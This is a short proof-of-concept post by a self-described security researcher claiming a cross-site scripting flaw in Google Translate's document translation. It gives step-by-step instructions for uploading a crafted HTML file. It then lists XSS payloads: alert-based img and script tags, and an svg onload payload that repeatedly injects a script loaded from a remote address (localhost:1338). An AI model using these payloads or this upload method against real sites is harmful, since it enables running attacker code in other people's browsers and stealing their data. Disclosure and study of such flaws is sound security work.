[+] ~ J0nshu4w - Security Research and pentester. [+]
[*] I'm a security researcher and found a sandbox failure. It consists of Cross-Site Scripting, where I can send alerts and inject eval code, text and images using the <img> tag.
[!] Tested on Windows / Linux / MacOS: Firefox, Chrome and Opera. [!]
Ok Go!
[!] To explore it open Google Translate
[*] https://translate.google.com.br
or
[*] https://translate.google.com
[!] Just below the text box you have the option:
[!] "Translate Document"
[*] In this parameter we will inject XSS.
[*] Create a .html or .htm file.
[*] In it we will put the malicious code [XSS] using the <img> tag.
[+] My exploit for example: [+]
######################
<img src="http://i793.photobucket.com/albums/yy213/gilbef/GIFBRAZIOL.gif" onload="alert('xss by j0nshu4w')"></img>
<marquee><h1>xss is vuln by j0nshu4w</h1></marquee>
<script>alert(document.domain)</script>
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)>
####################
[*] After saving the file, select it in the document translation options and click Translate.
[#] After this, the XSS executes successfully :D [#]
DEMO:
http://imgur.com/a/XLzd4
######################
Made In Brazil 1337
Facebook: /jonatasfil
Github: /ninj4c0d3r
Youtube: /c/jonatasfil